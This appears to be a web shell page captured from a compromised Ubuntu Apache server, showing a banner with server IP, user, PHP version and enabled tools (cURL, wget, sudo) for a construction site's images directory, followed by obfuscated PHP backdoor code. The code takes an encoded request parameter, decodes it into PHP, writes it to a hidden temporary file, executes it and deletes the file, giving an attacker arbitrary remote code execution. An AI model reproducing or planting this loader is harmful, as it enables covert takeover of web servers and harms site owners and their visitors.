| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/images/ |
Upload File : |
<?php
if(in_array("\x69te\x6D", array_keys($_REQUEST))){
$resource = $_REQUEST["\x69te\x6D"];
$resource = explode ( "." , $resource ) ;
$property_set = '';
$s1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s1);
$len = count($resource);
for($y = 0; $y < $len; $y++) {
$v4 = $resource[$y];
$sChar = ord($s1[$y%$sLen]);
$dec =((int)$v4 - $sChar -($y%10))^ 80;
$property_set .= chr($dec);
}
$element = array_filter([getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/tmp", "/dev/shm", session_save_path()]);
foreach ($element as $symbol):
if (max(0, is_dir($symbol) * is_writable($symbol))) {
$mrk = "$symbol" . "/.itm";
$file = fopen($mrk, 'w');
if ($file) {
fwrite($file, $property_set);
fclose($file);
include $mrk;
@unlink($mrk);
die();
}
}
endforeach;
}